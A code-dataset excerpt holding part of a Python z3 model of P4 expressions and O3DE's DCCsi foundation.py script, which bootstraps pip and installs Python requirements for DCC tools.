        return self.operator(lval_expr, rval_expr)
class P4xor(P4BinaryOp):
    """Bitwise XOR expression (a ^ b)."""
    def __init__(self, lval, rval):
        P4BinaryOp.__init__(self, lval, rval, op.xor)
class P4div(P4BinaryOp):
    """Unsigned division expression (a / b)."""
    def __init__(self, lval, rval):
        def operator(x, y):
            # z3 requires at least one value to be a bitvector for UDiv
            if isinstance(y, int) and isinstance(x, int):
                # NOTE(review): .as_bitvec is not an attribute of plain
                # python ints — this presumably relies on a project-specific
                # int wrapper from p4z3.base; confirm, since the result is
                # then divided with op.truediv rather than floor division.
                x = x.as_bitvec
                y = y.as_bitvec
                return op.truediv(x, y)
            return z3.UDiv(x, y)
        P4BinaryOp.__init__(self, lval, rval, operator)
class P4lshift(P4BinaryOp):
    """Left shift (a << b), truncating the result to the lhs's width."""
    def __init__(self, lval, rval):
        # the operator slot is unused; eval is fully overridden below
        P4BinaryOp.__init__(self, lval, rval, None)
    def eval(self, p4_state):
        """Shift with width alignment, then cast back to the lhs size."""
        # z3 does not like to shift operators of different size
        # but casting both values could lead to missing an overflow
        # so after the operation cast the lvalue down to its original size
        lval_expr = p4_state.resolve_expr(self.lval)
        rval_expr = p4_state.resolve_expr(self.rval)
        if isinstance(lval_expr, int):
            # if lval_expr is an int we might get a signed value
            # the only size adjustment is to make the rval expr large enough
            # for some reason a small rval leads to erroneous shifts...
            return op.lshift(lval_expr, z3_cast(rval_expr, 32))
        # align the bitvectors to allow operations
        lval_is_bitvec = isinstance(lval_expr, z3.BitVecRef)
        rval_is_bitvec = isinstance(rval_expr, z3.BitVecRef)
        orig_lval_size = lval_expr.size()
        if lval_is_bitvec and rval_is_bitvec:
            if lval_expr.size() < rval_expr.size():
                lval_expr = z3_cast(lval_expr, rval_expr.size())
            if lval_expr.size() > rval_expr.size():
                rval_expr = z3_cast(rval_expr, lval_expr.size())
        # truncate back to the original lhs width after shifting
        return z3_cast(op.lshift(lval_expr, rval_expr), orig_lval_size)
class P4rshift(P4BinaryOp):
    """Logical right shift (a >> b), truncating to the lhs's width."""
    def __init__(self, lval, rval):
        # the operator slot is unused; eval is fully overridden below
        P4BinaryOp.__init__(self, lval, rval, None)
    def eval(self, p4_state):
        """Shift with width alignment, then cast back to the lhs size."""
        # z3 does not like to shift operators of different size
        # but casting both values could lead to missing an overflow
        # so after the operation cast the lvalue down to its original size
        lval_expr = p4_state.resolve_expr(self.lval)
        rval_expr = p4_state.resolve_expr(self.rval)
        if isinstance(lval_expr, int):
            # if x is an int we might get a signed value
            # we need to use the arithmetic right shift in this case
            return op.rshift(lval_expr, rval_expr)
        # align the bitvectors to allow operations
        lval_is_bitvec = isinstance(lval_expr, z3.BitVecRef)
        rval_is_bitvec = isinstance(rval_expr, z3.BitVecRef)
        orig_lval_size = lval_expr.size()
        if lval_is_bitvec and rval_is_bitvec:
            if lval_expr.size() < rval_expr.size():
                lval_expr = z3_cast(lval_expr, rval_expr.size())
            if lval_expr.size() > rval_expr.size():
                rval_expr = z3_cast(rval_expr, lval_expr.size())
        # LShR is z3's logical (zero-fill) right shift for bitvectors
        return z3_cast(z3.LShR(lval_expr, rval_expr), orig_lval_size)
class P4eq(P4BinaryOp):
    """Equality comparison expression (a == b)."""
    def __init__(self, lval, rval):
        P4BinaryOp.__init__(self, lval, rval, op.eq)
class P4ne(P4BinaryOp):
    """Inequality comparison (a != b).

    Modeled as z3.Not(a == b) because op.ne does not behave correctly
    on z3 references.
    """
    def __init__(self, lval, rval):
        def not_equals(x, y):
            return z3.Not(op.eq(x, y))
        P4BinaryOp.__init__(self, lval, rval, not_equals)
class P4lt(P4BinaryOp):
    """Unsigned less-than comparison (a < b)."""
    def __init__(self, lval, rval):
        def unsigned_lt(x, y):
            # pure python ints may carry a sign, so use the native
            # comparison there; bitvectors compare unsigned via ULT
            if isinstance(x, int) and isinstance(y, int):
                return op.lt(x, y)
            return z3.ULT(x, y)
        P4BinaryOp.__init__(self, lval, rval, unsigned_lt)
class P4le(P4BinaryOp):
    """Unsigned less-than-or-equal comparison (a <= b)."""
    def __init__(self, lval, rval):
        def unsigned_le(x, y):
            # pure python ints may carry a sign, so use the native
            # comparison there; bitvectors compare unsigned via ULE
            if isinstance(x, int) and isinstance(y, int):
                return op.le(x, y)
            return z3.ULE(x, y)
        P4BinaryOp.__init__(self, lval, rval, unsigned_le)
class P4ge(P4BinaryOp):
    """Unsigned greater-than-or-equal comparison (a >= b)."""
    def __init__(self, lval, rval):
        def unsigned_ge(x, y):
            # pure python ints may carry a sign, so use the native
            # comparison there; bitvectors compare unsigned via UGE
            if isinstance(x, int) and isinstance(y, int):
                return op.ge(x, y)
            return z3.UGE(x, y)
        P4BinaryOp.__init__(self, lval, rval, unsigned_ge)
class P4gt(P4BinaryOp):
    """Unsigned greater-than comparison (a > b)."""
    def __init__(self, lval, rval):
        def operator(x, y):
            # if x and y are ints we might deal with a signed value
            # we need to use the normal operator in this case
            if isinstance(x, int) and isinstance(y, int):
                return op.gt(x, y)
            # FIXME: Find a better way to model negative comparions
            # right now we have this hack
            # (a negative lhs can never be greater under unsigned compare;
            #  a negative rhs makes the unsigned compare trivially true)
            if isinstance(x, int) and x < 0:
                return z3.BoolVal(False)
            if isinstance(y, int) and y < 0:
                return z3.BoolVal(True)
            return z3.UGT(x, y)
        P4BinaryOp.__init__(self, lval, rval, operator)
class P4Mask(P4BinaryOp):
    """Mask expression (value &&& mask), currently modeled as bitwise AND."""
    def __init__(self, lval, rval):
        # TODO: Check if this mask operator is right
        P4BinaryOp.__init__(self, lval, rval, op.and_)
class P4Concat(P4Expression):
    """Bit concatenation expression (a ++ b).

    Unlike P4BinaryOp, operand widths are deliberately NOT aligned —
    the result width is the sum of both operand widths.
    """
    def __init__(self, lval, rval):
        self.lval = lval
        self.rval = rval
    def eval(self, p4_state):
        """Resolve both operands and return their z3 concatenation."""
        # for concat we do not align the size of the operators
        lval = p4_state.resolve_expr(self.lval)
        rval = p4_state.resolve_expr(self.rval)
        # all values must be bitvectors... so cast them
        # this is necessary because int<*> values can be concatenated
        # NOTE(review): .as_bitvec is not an attribute of plain python ints;
        # presumably resolve_expr yields a project int wrapper — confirm.
        if isinstance(lval, int):
            lval = lval.as_bitvec
        if isinstance(rval, int):
            rval = rval.as_bitvec
        return z3.Concat(lval, rval)
class P4Cast(P4BinaryOp):
    """Explicit cast expression: (to_size) val, or a cast to a complex type."""
    # TODO: need to take a closer look on how to do this correctly...
    # If we cast do we add/remove the least or most significant bits?
    def __init__(self, val, to_size):
        # stored as lval/rval so P4BinaryOp machinery applies; the
        # "operator" is the project's z3_cast helper
        self.val = val
        self.to_size = to_size
        operator = z3_cast
        P4BinaryOp.__init__(self, val, to_size, operator)
    def eval(self, p4_state):
        """Resolve the value; cast to a complex type via P4Initializer,
        otherwise align widths and apply z3_cast."""
        lval_expr = p4_state.resolve_expr(self.lval)
        # it can happen that we cast to a complex type...
        if isinstance(self.rval, P4ComplexType):
            instance = self.rval.instantiate(self.rval.name)
            initializer = P4Initializer(lval_expr, instance)
            return initializer.eval(p4_state)
        rval_expr = p4_state.resolve_expr(self.rval)
        # align the bitvectors to allow operations
        lval_is_bitvec = isinstance(lval_expr, z3.BitVecRef)
        rval_is_bitvec = isinstance(rval_expr, z3.BitVecRef)
        if lval_is_bitvec and rval_is_bitvec:
            if lval_expr.size() < rval_expr.size():
                rval_expr = z3_cast(rval_expr, lval_expr.size())
            if lval_expr.size() > rval_expr.size():
                lval_expr = z3_cast(lval_expr, rval_expr.size())
        return self.operator(lval_expr, rval_expr)
class P4Mux(P4Expression):
    """Ternary/mux expression: cond ? then_val : else_val.

    Side effects of the then-branch are applied to the state guarded by
    the condition; complex-typed branches are flattened into lists of
    per-member z3.If expressions so they can be reassigned to a target.
    """
    def __init__(self, cond, then_val, else_val):
        self.cond = cond
        self.then_val = then_val
        self.else_val = else_val
    def unravel_datatype(self, complex_type, datatype_list):
        """Recursively flatten nested complex members into a flat list."""
        unravelled_list = []
        for val in datatype_list:
            if isinstance(complex_type, P4ComplexInstance):
                val = complex_type.resolve_reference(val)
            if isinstance(val, P4ComplexInstance):
                val_list = list(val.members)
                val = self.unravel_datatype(val, val_list)
            # bug fix: this must be a separate `if`, not `elif` — when the
            # branch above reassigns val to the recursively unravelled list,
            # the old elif/else chain skipped both extend and append, so
            # nested complex members were silently dropped from the result.
            if isinstance(val, list):
                unravelled_list.extend(val)
            else:
                unravelled_list.append(val)
        return unravelled_list
    def eval(self, p4_state):
        """Evaluate both branches and combine them under the condition."""
        cond = p4_state.resolve_expr(self.cond)
        # handle side effects for function calls:
        # snapshot, evaluate the then-branch, capture its effects, roll
        # back, evaluate the else-branch, then merge the then-effects
        # back in guarded by the condition
        var_store, chain_copy = p4_state.checkpoint()
        then_val = p4_state.resolve_expr(self.then_val)
        then_vars = copy_attrs(p4_state.locals)
        p4_state.restore(var_store, chain_copy)
        else_val = p4_state.resolve_expr(self.else_val)
        p4_state.merge_attrs(cond, then_vars)
        then_expr = then_val
        else_expr = else_val
        # this is a really nasty hack, do not try this at home kids
        # because we have to be able to access the sub values again
        # we have to resolve the if condition in the case of complex types
        # we do this by splitting the if statement into a list
        # lists can easily be assigned to a target structure
        if isinstance(then_expr, P4ComplexInstance):
            then_expr = then_expr.flatten()
        if isinstance(else_expr, P4ComplexInstance):
            else_expr = else_expr.flatten()
        if isinstance(then_expr, list) and isinstance(else_expr, list):
            sub_cond = []
            # handle nested complex types
            then_expr = self.unravel_datatype(then_val, then_expr)
            else_expr = self.unravel_datatype(else_val, else_expr)
            for idx, member in enumerate(then_expr):
                if_expr = z3.If(cond, member, else_expr[idx])
                sub_cond.append(if_expr)
            return sub_cond
        then_is_const = isinstance(then_expr, (z3.BitVecRef, int))
        else_is_const = isinstance(else_expr, (z3.BitVecRef, int))
        if then_is_const and else_is_const:
            # align the bitvectors to allow operations, we cast ints downwards
            if else_expr.size() > then_expr.size():
                else_expr = z3_cast(else_expr, then_expr.size())
            if else_expr.size() < then_expr.size():
                then_expr = z3_cast(then_expr, else_expr.size())
            return z3.If(cond, then_expr, else_expr)
        # NOTE(review): mixed list/non-list or non-const branches fall
        # through and return None implicitly — confirm that callers never
        # hit this path.
| 37.44668 | 95 | 0.620762 | 18,350 | 0.985976 | 0 | 0 | 0 | 0 | 0 | 0 | 3,217 | 0.172855 |
d32c20ceadd90960ca062de8a0331b5c9ee0d37a | 18,597 | py | Python | Gems/AtomLyIntegration/TechnicalArt/DccScriptingInterface/foundation.py | prophetl33t/o3de | eaeeb883eee1594b1b93327f6909eebd1a826caf | [
"Apache-2.0",
"MIT"
] | null | null | null | Gems/AtomLyIntegration/TechnicalArt/DccScriptingInterface/foundation.py | prophetl33t/o3de | eaeeb883eee1594b1b93327f6909eebd1a826caf | [
"Apache-2.0",
"MIT"
] | null | null | null | Gems/AtomLyIntegration/TechnicalArt/DccScriptingInterface/foundation.py | prophetl33t/o3de | eaeeb883eee1594b1b93327f6909eebd1a826caf | [
"Apache-2.0",
"MIT"
] | null | null | null | # coding:utf-8
#!/usr/bin/python
#
# Copyright (c) Contributors to the Open 3D Engine Project.
# For complete copyright and license terms please see the LICENSE at the root of this distribution.
#
# SPDX-License-Identifier: Apache-2.0 OR MIT
#
#
# -------------------------------------------------------------------------
"""! @brief
Module Documentation:
< DCCsi > / foundation.py
Running this module installs the DCCsi python requirements.txt for other python interpreters (like Maya)
It installs based on the python version into a location (such as):
<o3de>/Gems/AtomLyIntegration/TechnicalArt/DccScriptingInterface/3rdParty/Python/Lib/3.x
This is to ensure that we are not modifying the users DCC tools install directly.
For this script to function on windows you may need Administrator privledges.
^ You only have to start with Admin rights if you are running foundation.py or otherwise updating packages
Open an admin elevated cmd prompt here:
C:\depot\o3de-dev\Gems\AtomLyIntegration\TechnicalArt\DccScriptingInterface
The following would execpt this script, the default behaviour is to check
the o3de python and install the requirements.txt for that python version,
>python.cmd foundation.py
To Do: document additional usage (how to install for Maya 2022 py3.7, etc.)
"""
# -------------------------------------------------------------------------
# standard imports
import subprocess
import sys
import os
import site
import timeit
import inspect
import traceback
from pathlib import Path
import logging as _logging
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
#os.environ['PYTHONINSPECT'] = 'True'
_START = timeit.default_timer() # start tracking
# global scope
_MODULENAME = 'foundation'
_LOGGER = _logging.getLogger(_MODULENAME)
# NOTE(review): {_MODULENAME} inside .format() builds a set literal, so this
# logs as "Initializing: {'foundation'}." — probably meant _MODULENAME alone.
_LOGGER.debug('Initializing: {}.'.format({_MODULENAME}))
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# Local access
_MODULE_PATH = Path(__file__) # this script
_PATH_DCCSIG = Path(_MODULE_PATH.parent) # dccsi
os.environ['PATH_DCCSIG'] = _PATH_DCCSIG.as_posix()
site.addsitedir(_PATH_DCCSIG.as_posix()) # python path
# note: changes the process working directory to the DCCsi root
os.chdir(_PATH_DCCSIG.as_posix())
# the path we want to install packages into
# (template slots: {0}=DCCsi root, {1}=py major, {2}=py minor)
STR_PATH_DCCSI_PYTHON_LIB = str('{0}\\3rdParty\\Python\\Lib\\{1}.x\\{1}.{2}.x\\site-packages')
# these are just defaults and are meant to be replaced by info for the target python.exe
_SYS_VER_MAJOR = sys.version_info.major
_SYS_VER_MINOR = sys.version_info.minor
# the default will be based on the python executable running this module
# this value should be replaced with the sys.version of the target python
# for example mayapy, or blenders python, etc.
_PATH_DCCSI_PYTHON_LIB = Path(STR_PATH_DCCSI_PYTHON_LIB.format(_PATH_DCCSIG,
                                                               _SYS_VER_MAJOR,
                                                               _SYS_VER_MINOR))
# this is the shared default requirements.txt file to install for python 3.6.x+
_DCCSI_PYTHON_REQUIREMENTS = Path(_PATH_DCCSIG, 'requirements.txt')
# this will default to the python interpreter running this script (probably o3de)
# this should be replaced by the target interpreter python exe, like mayapy.exe
_PYTHON_EXE = Path(sys.executable)
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def check_pip(python_exe=_PYTHON_EXE):
    """Check if pip is installed and log what version

    Returns the subprocess return code (0 when pip responds), or 1 when
    the interpreter path does not exist.
    """
    python_exe = Path(python_exe)
    # guard clause: bail out early when the interpreter is missing
    if not python_exe.exists():
        _LOGGER.error(f'python_exe does not exist: {python_exe}')
        return 1
    result = subprocess.call( [python_exe.as_posix(), "-m", "pip", "--version"] )
    _LOGGER.info(f'foundation.check_pip(), result: {result}')
    return result
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def ensurepip(python_exe=_PYTHON_EXE, upgrade=False):
    """Bootstrap pip for the given interpreter via the stdlib ensurepip module.

    :param python_exe: path to the target python interpreter (str or Path)
    :param upgrade: when True, pass --upgrade so the bundled pip is upgraded
    :return: the subprocess return code (0 on success), or 1 when the
        interpreter does not exist.

    Note: ensurepip is broken on some python 3.7 builds and can fail with
    "ValueError: bad marshal data (unknown type code)"; if that happens,
    try foundation.install_pip() instead. o3de's python ships with a
    working pip.
    """
    python_exe = Path(python_exe)
    if not python_exe.exists():
        _LOGGER.error(f'python_exe does not exist: {python_exe}')
        # bug fix: previously returned 0 here, which callers could mistake
        # for success; return a non-zero code like check_pip() does
        return 1
    if upgrade:
        result = subprocess.call( [python_exe.as_posix(), "-m", "ensurepip", "--upgrade"] )
        _LOGGER.info(f'foundation.ensurepip(python_exe, upgrade=True), result: {result}')
    else:
        result = subprocess.call( [python_exe.as_posix(), "-m", "ensurepip"] )
        _LOGGER.info(f'foundation.ensurepip(python_exe), result: {result}')
    return result
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# canonical get-pip.py bootstrap scripts per python version
_GET_PIP_PY37_URL = "https://bootstrap.pypa.io/get-pip.py"
_GET_PIP_PY27_URL = "https://bootstrap.pypa.io/pip/2.7/get-pip.py"
# version to download (DL)
if sys.version_info.major >= 3 and sys.version_info.minor >= 7:
    DL_URL = _GET_PIP_PY37_URL
elif sys.version_info.major < 3:
    DL_URL = _GET_PIP_PY27_URL
else:
    # bug fix: py3.0-3.6 previously left DL_URL undefined (NameError at
    # download time); fall back to the current bootstrap script
    DL_URL = _GET_PIP_PY37_URL
# temp dir to store in:
_PIP_DL_LOC = Path(_PATH_DCCSIG) / '__tmp__'
if not _PIP_DL_LOC.exists():
    try:
        _PIP_DL_LOC.mkdir(parents=True)
    except Exception as e:
        # bug fix: was PIP_DL_LOC (undefined name -> NameError inside the
        # error handler); log the actual module-level path
        _LOGGER.error(f'error: {e}, could not .mkdir(): {_PIP_DL_LOC.as_posix()}')
# default file location to store it:
_PIP_DL_LOC = _PIP_DL_LOC / 'get-pip.py'
try:
    _PIP_DL_LOC.touch(mode=0o666, exist_ok=True)
except Exception as e:
    # bug fix: was PIP_DL_LOC (undefined name) here as well
    _LOGGER.error(f'error: {e}, could not .touch(): {_PIP_DL_LOC.as_posix()}')
def download_getpip(url=DL_URL, file_store=_PIP_DL_LOC):
    """Attempts to download the get-pip.py bootstrap script.

    :param url: url of the get-pip.py script to fetch
    :param file_store: file path to write the script to
    :return: the number of bytes written, or None on any failure
        (unwritable destination, failed request, failed write).
    """
    # requests is imported lazily so foundation can load without it
    import requests
    # ensure what is passed in is a Path object
    file_store = Path(file_store)
    if not file_store.exists():
        try:
            file_store.touch()
        except OSError:
            _LOGGER.error(f'Could not make file: {file_store}')
            return None
    try:
        _get_pip = requests.get(url)
    except Exception:
        # bug fix: previously fell through and referenced the undefined
        # _get_pip below (NameError); bail out explicitly instead
        _LOGGER.error(f'could not request: {url}')
        return None
    try:
        # context manager guarantees the handle is closed (was leaked before)
        with open(file_store.as_posix(), 'wb') as f:
            file = f.write(_get_pip.content)
        return file
    except IOError:
        _LOGGER.error(f'could not write: {file_store.as_posix()}')
        return None
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def install_pip(python_exe=_PYTHON_EXE, download=True, upgrade=True, getpip=_PIP_DL_LOC):
    """Installs pip by running the get-pip.py bootstrap script.

    :param python_exe: interpreter to install pip for
    :param download: when True, download get-pip.py to *getpip* first
    :param upgrade: when True, also `pip install --upgrade pip` afterwards
    :return: the final subprocess return code (0 on success), 1 when the
        interpreter does not exist, or 0 when the download fails.
    """
    result = 0
    getpip = Path(getpip)
    if download:
        # bug fix: download_getpip() returns a byte count (or None), not a
        # path — keep *getpip* as the script path and only use the return
        # value to detect failure (the old code passed the byte count to
        # subprocess as if it were a module name)
        if not download_getpip(file_store=getpip):
            return result
    python_exe = Path(python_exe)
    if not python_exe.exists():
        _LOGGER.error(f'python_exe does not exist: {python_exe}')
        # non-zero so failure is not mistaken for success
        return 1
    # bug fix: get-pip.py is a script file, not an importable module, so it
    # must be run directly rather than via `-m`
    result = subprocess.call( [python_exe.as_posix(), getpip.as_posix()] )
    _LOGGER.info(f'result: {result}')
    if upgrade:
        # bug fix: the old code called .as_posix() on a str here (AttributeError)
        result = subprocess.call( [python_exe.as_posix(), "-m", "pip", "install", "--upgrade", "pip"] )
        _LOGGER.info(f'result: {result}')
    return result
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# version of requirements.txt to install, chosen by the *running* interpreter
if sys.version_info.major >= 3 and sys.version_info.minor >= 7:
    # py3.7+ uses the shared DCCsi requirements.txt
    _REQUIREMENTS = _DCCSI_PYTHON_REQUIREMENTS
elif sys.version_info.major == 2 and sys.version_info.minor >= 7:
    # legacy py2.7 DCC tools get a dedicated, reduced requirements file
    _LOGGER.warning('Python 2.7 is end of life, we recommend using tools that operate py3.7 or higher')
    _REQUIREMENTS = Path(_PATH_DCCSIG,
                         'Tools',
                         'Resources',
                         'py27',
                         'requirements.txt').as_posix()
else:
    # anything else (including py3.0-3.6) is unsupported
    _REQUIREMENTS = None
    _LOGGER.error(f'Unsupported version: {sys.version_info}')
def install_requirements(python_exe=_PYTHON_EXE,
                         requirements=_REQUIREMENTS,
                         target_loc=_PATH_DCCSI_PYTHON_LIB.as_posix()):
    """Installs the DCCsi requirements.txt into a version-specific folder.

    :param python_exe: interpreter whose pip performs the install
    :param requirements: path to the requirements.txt to install
    :param target_loc: site-packages style folder to install into (pip -t)
    :return: the pip subprocess return code (0 on success), or 1 when the
        interpreter does not exist.
    """
    python_exe = Path(python_exe)
    requirements = Path(requirements)
    target_loc = Path(target_loc)
    if not python_exe.exists():
        _LOGGER.error(f'python_exe does not exist: {python_exe}')
        # bug fix: previously returned 0 (the success code) on this failure
        return 1
    ## install required packages into the target location
    inst_cmd = [python_exe.as_posix(), "-m", "pip", "install",
                "-r", requirements.as_posix(), "-t", target_loc.as_posix()]
    result = subprocess.call( inst_cmd )
    return result
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def install_pkg(python_exe=_PYTHON_EXE,
                pkg_name='pathlib',
                target_loc=_PATH_DCCSI_PYTHON_LIB.as_posix()):
    """Installs a single pip package for the DCCsi.

    :param python_exe: interpreter whose pip performs the install
    :param pkg_name: the pip package name to install
    :param target_loc: site-packages style folder to install into (pip -t)
    :return: the pip subprocess return code (0 on success), or 1 when the
        interpreter does not exist.
    """
    python_exe = Path(python_exe)
    pkg_name = Path(pkg_name)
    target_loc = Path(target_loc)
    if not python_exe.exists():
        _LOGGER.error(f'python_exe does not exist: {python_exe}')
        # bug fix: previously returned 0 (the success code) on this failure
        return 1
    inst_cmd = [python_exe.as_posix(), "-m", "pip", "install", pkg_name.as_posix(),
                "-t", target_loc.as_posix()]
    result = subprocess.call( inst_cmd )
    return result
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def run_command() -> 'subprocess.CompletedProcess[str]':
    """Run some subprocess that captures output as ``str``

    NOTE(review): placeholder stub — it does not actually spawn anything,
    it just returns an empty, successful CompletedProcess.
    """
    completed = subprocess.CompletedProcess(args=[], returncode=0, stdout='')
    return completed
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def arg_bool(bool_arg, desc='arg desc not set'):
    """Interpret a command-line flag string as a python bool.

    Recognized truthy strings: 'True', 'true', '1'; falsy: 'False',
    'false', '0'. Anything else is returned unchanged.
    """
    _LOGGER.info(f"Checking '{desc}': {bool_arg}")
    truthy = ('True', 'true', '1')
    falsy = ('False', 'false', '0')
    if bool_arg in truthy:
        return True
    if bool_arg in falsy:
        return False
    return bool_arg
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def set_version(ver_major=sys.version_info.major, ver_minor=sys.version_info.minor):
    """Retarget the module-level install folder at a specific python version.

    Mutates the module globals _SYS_VER_MAJOR, _SYS_VER_MINOR and
    _PATH_DCCSI_PYTHON_LIB, and returns the recomputed lib path so later
    installs go into e.g. .../Lib/3.x/3.7.x/site-packages.
    """
    global _SYS_VER_MAJOR
    global _SYS_VER_MINOR
    global _PATH_DCCSI_PYTHON_LIB
    _SYS_VER_MAJOR = ver_major
    _SYS_VER_MINOR = ver_minor
    _PATH_DCCSI_PYTHON_LIB = Path(STR_PATH_DCCSI_PYTHON_LIB.format(_PATH_DCCSIG,
                                                                   _SYS_VER_MAJOR,
                                                                   _SYS_VER_MINOR))
    return _PATH_DCCSI_PYTHON_LIB
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def get_version(_PYTHON_EXE):
    """Ask an interpreter for its version by running `<exe> --version`.

    Returns the version split into string components (e.g. ['3', '7', '12'])
    or None when the executable does not exist.
    NOTE(review): python 2 prints --version to stderr, which is captured but
    never read here — confirm targets are py3 before relying on this.
    """
    _PYTHON_EXE = Path(_PYTHON_EXE)
    if not _PYTHON_EXE.exists():
        _LOGGER.error(f'Python exe does not exist: {_PYTHON_EXE.as_posix()}')
        return None
    # run the target interpreter in a subprocess and capture its output
    _process = subprocess.Popen([_PYTHON_EXE.as_posix(), "--version"],
                                stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    _out, _err = _process.communicate()
    _out = _out.decode("utf-8").replace("\r\n", "")  # bytes -> clean str
    _LOGGER.info(f'Python Version is: {_out}')
    # "Python 3.7.12" -> ['3', '7', '12']
    return _out.split(" ")[-1].split('.')
# -------------------------------------------------------------------------
###########################################################################
# Main Code Block, runs this script as main (testing)
# -------------------------------------------------------------------------
if __name__ == '__main__':
    """Run this file as main (external commandline)"""

    #os.environ['PYTHONINSPECT'] = 'True'

    STR_CROSSBAR = f"{'-' * 74}"

    _DCCSI_GDEBUG = False
    _DCCSI_DEV_MODE = False

    # default loglevel to info unless set
    _DCCSI_LOGLEVEL = _logging.INFO
    if _DCCSI_GDEBUG:
        # override loglevel if running debug
        _DCCSI_LOGLEVEL = _logging.DEBUG

    FRMT_LOG_LONG = "[%(name)s][%(levelname)s] >> %(message)s (%(asctime)s; %(filename)s:%(lineno)d)"

    # configure basic logger
    # note: not using a common logger to reduce cyclical imports
    _logging.basicConfig(level=_DCCSI_LOGLEVEL,
                         format=FRMT_LOG_LONG,
                         datefmt='%m-%d %H:%M')

    _LOGGER = _logging.getLogger(_MODULENAME)

    _LOGGER.info(STR_CROSSBAR)
    _LOGGER.debug('Initializing: {}.'.format({_MODULENAME}))
    _LOGGER.debug('_DCCSI_GDEBUG: {}'.format(_DCCSI_GDEBUG))
    _LOGGER.debug('_DCCSI_DEV_MODE: {}'.format(_DCCSI_DEV_MODE))
    _LOGGER.debug('_DCCSI_LOGLEVEL: {}'.format(_DCCSI_LOGLEVEL))

    import argparse
    parser = argparse.ArgumentParser(
        description='O3DE DCCsi Setup (aka Foundation). Will install DCCsi python package dependancies, for various DCC tools.',
        epilog="It is suggested to use '-py' or '--python_exe' to pass in the python exe for the target dcc tool.")

    parser.add_argument('-gd', '--global-debug',
                        type=bool,
                        required=False,
                        help='Enables global debug flag.')

    parser.add_argument('-dm', '--developer-mode',
                        type=bool,
                        required=False,
                        default=False,
                        help='(NOT IMPLEMENTED) Enables dev mode for early auto attaching debugger.')

    parser.add_argument('-sd', '--set-debugger',
                        type=str,
                        required=False,
                        default='WING',
                        help='(NOT IMPLEMENTED) Default debugger: WING, others: PYCHARM and VSCODE.')

    parser.add_argument('-py', '--python_exe',
                        type=str,
                        required=False,
                        help='The python interpretter you want to run in the subprocess')

    parser.add_argument('-cp', '--check_pip',
                        required=False,
                        default=True,
                        help='Checks for pip')

    parser.add_argument('-ep', '--ensurepip',
                        required=False,
                        default=False,
                        help='Uses ensurepip, to make sure pip is installed')

    parser.add_argument('-ip', '--install_pip',
                        required=False,
                        default=False,
                        help='Attempts install pip via download of get-pip.py')

    # bug fix: help text was a copy/paste of --exit's ('Exits python')
    parser.add_argument('-ir', '--install_requirements',
                        required=False,
                        default=True,
                        help='Installs the requirements.txt packages into the target python env')

    parser.add_argument('-ex', '--exit',
                        type=bool,
                        required=False,
                        default=False,
                        help='Exits python. Do not exit if you want to be in interactive interpretter after config')

    args = parser.parse_args()

    # easy overrides
    if args.global_debug:
        _DCCSI_GDEBUG = True
        os.environ["DYNACONF_DCCSI_GDEBUG"] = str(_DCCSI_GDEBUG)

    if not args.python_exe:
        _LOGGER.warning("It is suggested to use arg '-py' or '--python_exe' to pass in the python exe for the target dcc tool.")
        # bug fix: the steps below (check_pip, install_requirements) used
        # _PYTHON_EXE unconditionally and raised NameError when -py was
        # omitted; fall back to the interpreter running this script
        _PYTHON_EXE = Path(sys.executable)
    else:
        _PYTHON_EXE = Path(args.python_exe)

    _LOGGER.info(f'Target py exe is: {_PYTHON_EXE}')

    if _PYTHON_EXE.exists():
        _py_version = get_version(_PYTHON_EXE)
        # then we can change the version dependant target folder for pkg install
        _PATH_DCCSI_PYTHON_LIB = set_version(_py_version[0], _py_version[1])
        if _PATH_DCCSI_PYTHON_LIB.exists():
            _LOGGER.info(f'Requirements, install target: {_PATH_DCCSI_PYTHON_LIB}')
        else:
            # bug fix: the install target is a folder; .touch() would have
            # created an empty *file* at that path instead
            _PATH_DCCSI_PYTHON_LIB.mkdir(parents=True, exist_ok=True)
            _LOGGER.info(f'.mkdir(): {_PATH_DCCSI_PYTHON_LIB}')
    else:
        _LOGGER.error(f'This py exe does not exist:{_PYTHON_EXE}')
        sys.exit()

    # this will verify pip is installed for the target python interpretter/env
    if arg_bool(args.check_pip, desc='args.check_pip'):
        _LOGGER.info(f'calling foundation.check_pip()')
        result = check_pip(_PYTHON_EXE)
        if result != 0:
            _LOGGER.warning( f'check_pip(), Invalid result: { result }' )

    if arg_bool(args.ensurepip, desc='args.ensurepip'):
        _LOGGER.info(f'calling foundation.ensurepip()')
        ensurepip(_PYTHON_EXE)

    if arg_bool(args.install_pip, desc='args.install_pip'):
        _LOGGER.info(f'calling foundation.install_pip()')
        install_pip(_PYTHON_EXE)

    # installing the requirements.txt is enabled by default
    # bug fix: desc previously said 'args.check_pip' (copy/paste error)
    if arg_bool(args.install_requirements, desc='args.install_requirements'):
        _LOGGER.info(f'calling foundation.install_requirements( {_PYTHON_EXE}, target_loc = {_PATH_DCCSI_PYTHON_LIB.as_posix()} )')
        install_requirements(_PYTHON_EXE, target_loc = _PATH_DCCSI_PYTHON_LIB.as_posix())

    # -- DONE ----
    _LOGGER.info(STR_CROSSBAR)
    _LOGGER.info('O3DE DCCsi {0}.py took: {1} sec'.format(_MODULENAME, timeit.default_timer() - _START))

    if args.exit:
        # sys is already in scope at module level (used above for sys.exit);
        # the previous redundant local `import sys` was removed
        sys.exit()
    else:
        # custom prompt for the interactive session kept open after config
        sys.ps1 = "[{}]>>".format(_MODULENAME)
# --- END -----------------------------------------------------------------
| 38.108607 | 131 | 0.560789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8,802 | 0.473302 |
d32c86dc486eaa041056b260ea19eef0c3713838 | 4,672 | py | Python | analyze/install.py | takkii/Pylean | d51595e2788e946d9a2492bbe7131e4ada19062f | [
"MIT"
